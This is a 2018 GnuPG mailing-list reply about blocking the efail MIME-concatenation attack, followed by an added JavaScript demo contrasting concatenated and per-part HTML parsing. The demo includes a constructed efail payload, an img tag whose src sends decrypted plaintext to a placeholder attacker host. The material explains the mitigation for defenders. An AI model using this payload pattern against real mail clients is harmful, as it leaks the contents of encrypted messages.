Breaking MIME concatenation

Patrick Brunschwig patrick at enigmail.net
Tue May 15 17:44:17 CEST 2018


On 15.05.18 16:59, Andrew Gallagher wrote:
> It struck me at lunch that it might be possible for gnupg itself to
> scupper the MIME concatenation (direct exfiltration) technique mentioned
> in efail, and thereby plug the leaks in multiple vulnerable clients at
> once. This would however require it to be naughty with its output.
> 
> MIME concatenation works because in many clients the individual MIME
> parts of a message are not kept isolated from each other after they are
> passed to the rendering engine. Instead, they are concatenated together
> into a single document, perhaps with some separator such as an hline.
> This is dangerous because an HTML parser will interpret that document as
> a single unit, breaking all sorts of same-origin hygiene.
> 
> The primary technique for exfiltration is to wrap the target document in
> an active HTML tag such as <img href="....">. But HTML requires the
> quoted string to be safe, and there is no way for the efail attack to
> perform input sanitisation on the target document before the HTML parser
> gets its hands on it.
> 
> Bear with me, because this is *not* a fully thought-out plan, merely an
> idea. ;-)
> 
> So gnupg could (under circumstances likely to prevail inside a mail
> client) prefix and/or suffix its output with an HTML content-injection
> string specially designed to break out of whatever active element the
> efail attack might be using. It could be as simple as prefacing the
> output document with the perfectly valid HTML tag:
> 
> <!-- "></html>" -->

I already tried a while ago to trick the Thunderbird HTML rendering
engine with tricks like this... They don't work. The rendering engine
ignores the </html> tag (and also tags like </body>).

I think the correct solution must be to treat each MIME part
independently, i.e. it needs to be parsed independently by the HTML
engine and produce its own DOM tree. At the end, you can concatenate
these DOM trees and create a single correct HTML document.

-Patrick
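An added illustration of the two rendering strategies discussed above (not code from the original thread, from Enigmail or from Thunderbird): a toy JavaScript tokenizer that reproduces the two HTML parsing rules the direct-exfiltration trick relies on, run once over the MIME parts joined into a single document and once over each part on its own, with the per-part node lists then concatenated as a stand-in for Patrick's "one DOM tree per part". The three parts, the plaintext and the hostname attacker.invalid are constructed for the example; the tokenizer recognises only <img> and is not a browser engine.

```javascript
'use strict';

// Toy HTML tokenizer producing a flat node list: {type:'text', value} and
// {type:'img', src}. Only <img ...> becomes an element; other start tags are
// parsed and dropped, end tags are skipped. Two HTML-spec behaviours that the
// efail MIME-concatenation trick depends on are reproduced:
//  1. a quoted attribute value runs until its closing quote, across newlines
//     and any text sitting in between;
//  2. a tag still open at end of input (eof-in-tag) is discarded entirely.
function tokenize(html) {
  const nodes = [];
  let text = '';
  let i = 0;
  const flushText = () => {
    if (text) { nodes.push({ type: 'text', value: text }); text = ''; }
  };
  while (i < html.length) {
    if (html[i] === '<' && html[i + 1] === '/') {          // end tag: skip it
      const gt = html.indexOf('>', i);
      i = gt === -1 ? html.length : gt + 1;
      continue;
    }
    if (html[i] !== '<' || !/[A-Za-z]/.test(html[i + 1] || '')) {
      text += html[i++];                                    // plain character data
      continue;
    }
    let j = i + 1;
    let name = '';
    while (j < html.length && /[A-Za-z0-9]/.test(html[j])) name += html[j++];
    const attrs = {};
    let closed = false;
    while (j < html.length) {
      while (j < html.length && /\s/.test(html[j])) j++;
      if (j >= html.length) break;
      if (html[j] === '>') { closed = true; j++; break; }
      if (html[j] === '/') { j++; continue; }
      let attrName = '';
      while (j < html.length && !/[\s=>\/]/.test(html[j])) attrName += html[j++];
      while (j < html.length && /\s/.test(html[j])) j++;
      let value = '';
      if (html[j] === '=') {
        j++;
        while (j < html.length && /\s/.test(html[j])) j++;
        const q = html[j];
        if (q === '"' || q === "'") {
          const end = html.indexOf(q, j + 1);
          if (end === -1) { j = html.length; break; }      // unterminated quote -> eof-in-tag
          value = html.slice(j + 1, end);                   // rule 1: everything up to the quote
          j = end + 1;
        } else {
          while (j < html.length && !/[\s>]/.test(html[j])) value += html[j++];
        }
      }
      if (attrName) attrs[attrName.toLowerCase()] = value;
    }
    if (!closed) break;                                     // rule 2: discard open tag
    flushText();
    if (name.toLowerCase() === 'img') nodes.push({ type: 'img', src: attrs.src || '' });
    i = j;
  }
  flushText();
  return nodes;
}

// Constructed sample: the three MIME parts an attacker assembles for the
// direct-exfiltration variant. Part 2 stands in for the decrypted plaintext
// the client receives from gnupg; attacker.invalid is a placeholder host.
const PARTS = [
  '<img src="http://attacker.invalid/collect?d=',   // attacker: opens the attribute
  'Secret: the meeting is at 10:00 in room 4',       // decrypted plaintext
  '">',                                              // attacker: closes the attribute
];

// Vulnerable client behaviour: the parts are joined into one document first.
function renderConcatenated(parts) {
  return tokenize(parts.join('\n'));
}

// Behaviour proposed in the mail: each part parsed on its own, then the
// resulting trees (here: node lists) concatenated.
function renderIsolated(parts) {
  return parts.flatMap(part => tokenize(part));
}

// The URLs a renderer would fetch for a node list.
function fetchedUrls(nodes) {
  return nodes.filter(n => n.type === 'img').map(n => n.src);
}

console.log('concatenated ->', fetchedUrls(renderConcatenated(PARTS)));
console.log('isolated     ->', fetchedUrls(renderIsolated(PARTS)), renderIsolated(PARTS));
```

With the parts concatenated, the only img element carries the whole of part 2 inside its src, so rendering would send the plaintext to the attacker's host. Parsed in isolation, part 1 is an unterminated tag and yields no element at all, part 2 is ordinary text, and part 3 is just the two characters `">`; joining those node lists afterwards cannot recreate the attribute, because the parse state never crosses a part boundary.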
